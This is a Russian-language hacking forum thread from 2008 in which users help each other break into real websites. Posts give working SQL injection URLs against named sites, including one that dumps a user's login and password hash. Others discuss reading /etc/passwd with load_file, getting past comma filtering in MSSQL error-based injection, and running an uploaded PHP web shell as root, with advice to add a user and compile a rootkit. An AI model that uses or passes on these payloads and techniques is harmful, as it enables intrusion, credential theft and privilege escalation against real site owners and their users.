Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    masterBlack
    Колонка usr_login
     
    1 person likes this.
  2. masterBlack

    masterBlack New Member

    Joined:
    12 Jun 2008
    Messages:
    18
    Likes Received:
    2
    Reputations:
    0
    Вбиваю я
    http://catalog.vimdivision.ru/index.php?rn_id=-1+union+select+1,column_name,3,4,5,6,7%20from+information_schema.columns+where+table_name=0x7573725f6c6f67696e+limit+1,1/*
    а мне отображается пустая страница!
     
  3. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    В чём проблема то?
    http://catalog.vimdivision.ru/index.php?rn_id=-1+union+select+1,column_name,3,4,5,6,7+from+information_schema.columns+where+table_name=0x757365727461626c65--
    usr_id (0) » usr_name (0) » grp_id (0) » usr_login (0) » usr_password (0)

    http://catalog.vimdivision.ru/index.php?rn_id=-1+union+select+1,concat_ws(0x3a,usr_id,usr_name,grp_id,usr_login,usr_password),3,4,5,6,7+from+usertable+limit+0,1--

    1:Николай:0:aries:b3bd3c36b29a243c9f510720cd417d14
     
  4. masterBlack

    masterBlack New Member

    Joined:
    12 Jun 2008
    Messages:
    18
    Likes Received:
    2
    Reputations:
    0
    Оооо пасиба! а то Я чет ваше прогнался и накосячил с запросом!
    А сбрутить поможете?
     
  5. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    masterBlack, https://forum.antichat.org/thread67624.html
     
    #2585 .Slip, 12 Jul 2008
    Last edited by a moderator: 16 Jul 2008
    2 people like this.
  6. masterBlack

    masterBlack New Member

    Joined:
    12 Jun 2008
    Messages:
    18
    Likes Received:
    2
    Reputations:
    0
    А как сдампить бд зная логин и пасс админа, но не зная ее располажения и названия? БД MySQL!!!
     
  7. Sharingan

    Sharingan Elder - Старейшина

    Joined:
    5 May 2007
    Messages:
    143
    Likes Received:
    147
    Reputations:
    16
    Помогите разобратся, надо знач SMF похекать,делаю все согласно тому что написано тут , но когда захожу на
    http://site.com/forum/Themes/default/index.php меня перебрасывает на индекс форума, и я посмотрел на других форумах (с данной версий движка) с этого файла также перекидывает на главную форума, версию вроде не фиксили, что я не так делаю, спасибо
     
  8. 2la.painkiller

    2la.painkiller New Member

    Joined:
    22 May 2008
    Messages:
    26
    Likes Received:
    4
    Reputations:
    -10
    Народ
    1. load_file(0x2F6574632F706173737764)
    x2F6574632F706173737764
    это какая кодировка? чем или где можно расшифровать?
    2. чем или где можно закодировать, расшифровать в 16бит?
    Заранее спс
     
  9. MaSTeR GэN

    MaSTeR GэN Member

    Joined:
    23 May 2008
    Messages:
    102
    Likes Received:
    54
    Reputations:
    7
    2la.painkiller
    1.x'hexstring'
    2.http://www.bigprism.com/online-tools/base64-hex-ascii-encoder-decoder.html
     
  10. Sharingan

    Sharingan Elder - Старейшина

    Joined:
    5 May 2007
    Messages:
    143
    Likes Received:
    147
    Reputations:
    16
    кто нить ответит по поводу сообщения #2621, есть ли так уъязвимость иль нету, че я не так делаю
     
  11. none222

    none222 Guest

    Reputations:
    0
    маза в том что нужно чтобы админ перешёл по линку, когда он будет авторихован и чтобы у него всё сработало))
     
  12. DDoSька

    DDoSька Elder - Старейшина

    Joined:
    5 May 2008
    Messages:
    317
    Likes Received:
    352
    Reputations:
    18
    http://www.svetlana-russkaya.ru/index.php?pid=-101+union+select+1,2,3,4,5,6,7/*

    Колонки подобраны не правильно,скоре всего


    http://www.svetlana-russkaya.ru/index.php?pid=7&forf_tid=46+order+by+9/*&forf_page_num=1


    помогите аскрутить плиз...
     
  13. Dima-k17

    Dima-k17 Elder - Старейшина

    Joined:
    15 Sep 2005
    Messages:
    29
    Likes Received:
    19
    Reputations:
    20
    Да просто версия Мускуля - 3-я, у нее нет UNION'a:
    http://www.svetlana-russkaya.ru/index.php?pid=101+and+substring(version(),1,1)=3
    ---
    Боюсь в третьей версии ничего сделать не выйдет( слишком много ограничений...
     
  14. MaSTeR GэN

    MaSTeR GэN Member

    Joined:
    23 May 2008
    Messages:
    102
    Likes Received:
    54
    Reputations:
    7
    хм и почему же ты так решил ? )
    http://www.svetlana-russkaya.ru/index.php?pid=101
    user=svetlana@localhost
    database=svetlana
    version=3.23.58
    попробуй найти установочную директорию скрипта может если права на юзера криво выставленны удастся прочитать файлы
     
    #2594 MaSTeR GэN, 14 Jul 2008
    Last edited: 14 Jul 2008
    1 person likes this.
  15. NamahS

    NamahS New Member

    Joined:
    26 Jun 2008
    Messages:
    26
    Likes Received:
    0
    Reputations:
    0
    Фильтрация запятых

    Всем привет!
    Есть вопросы по MSSQL.
    Есть рабочая уязвимость, например:
    /?part=npcs&id=1+OR+1=(select+db_name(1))-- и т.д. в db_name -- получаем все базы.
    В ошибках типа Syntax error converting the varchar value 'ТО ЧТО ИНТЕРЕСОВАЛО' to a column of data type int. вытаскиваются значения таблиц, полей, значений, но только типа varchar...
    Все другие типы ( int,binary и т.д.) не возвращаются!!!
    Мозг сломал не пойму, что сделать можно. Пробовал привести искомые значения к типу nvarchar ( чтобы была ошибка преобразования в int). Например :
    /?part=items&id=1+OR+1=(select+top+1+cast(id+as+nvarchar)+from+sa_names)--
    или так /?part=items&id=1+OR+1=(select+top+1+convert(nvarchar,id)+from+sa_names)--
    ...значения не возвращаются...
    И самое паршивое то, что запятые фильтруются даже в url encode %2C....и последний запрос интерпретируется как convert(nvarcharid)...
    Как-то можно в таком случае, в запросе спровоцировать ошибку приведения типов или как еще....нужно выводить типы int и Binary....
    Заранее ОГРОМНОЕ СПАСИБО !!!
     
    #2595 NamahS, 14 Jul 2008
    Last edited: 14 Jul 2008
  16. Xster

    Xster New Member

    Joined:
    8 Jul 2008
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Помогите, пожалуйста, разобраться с правами шелла.

    Суть проблемы:

    Залил PHPшелл на сайт - права user/user.
    Некий рутовский процесс скопировал этот сайт в директорию не доступную из web, но доступную из шелла. Соответсвенно скопировал и мой шелл. Поскольку при копировании файлу присваиваются права копирующего, то в этой директории шелл приобрел права root/wheel и доступен на чтение.
    Я создал в директории доступной из web символическую(мягкую) ссылку на каталог(не на файл) в котором находится рутовский шелл и зашел на него через браузер.
    В итоге файл-шелл имеет Permission root/wheel, но работает он почему-то на тех же правах user/user.

    Нифига не пойму. Почему он НЕ работает на правах root?
    Спасибо.
     
  17. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    Потому что в данном случае пхп запускается с правами апача, а не с правами владельца скрипта.
     
    #2597 Qwazar, 14 Jul 2008
    Last edited: 14 Jul 2008
    2 people like this.
  18. NamahS

    NamahS New Member

    Joined:
    26 Jun 2008
    Messages:
    26
    Likes Received:
    0
    Reputations:
    0
    Пожалуйста ответьте на #2634
     
  19. Xster

    Xster New Member

    Joined:
    8 Jul 2008
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Пять раз прочел и не совсем понял, скорее всего ты пропустил частицу "не" перед "с правами апача".
    Если так, то ведь владелец скрипта как раз root/wheel. А может ты пропустил частицу "не" перед "с теми правами владельца..."
    Тогда нужен шелл на перл или другом языке? на каком? или может скомпилировать программу которая запустится как процесс и выполнит то что мне надо на правах root?
     
    #2599 Xster, 14 Jul 2008
    Last edited: 14 Jul 2008
  20. 5taY3r

    5taY3r Elder - Старейшина

    Joined:
    10 May 2007
    Messages:
    38
    Likes Received:
    35
    Reputations:
    0
    Взял на себя смелость поправить...)
    Насчёт шелла на перле идея хорошая, только скомпилить прогу с рутовскими правами будет трудно. Как вариант можно попробовать добавить пользователя, а потом от его имени что-то компилить, например руткит...
     
    1 person likes this.
Thread Status:
Not open for further replies.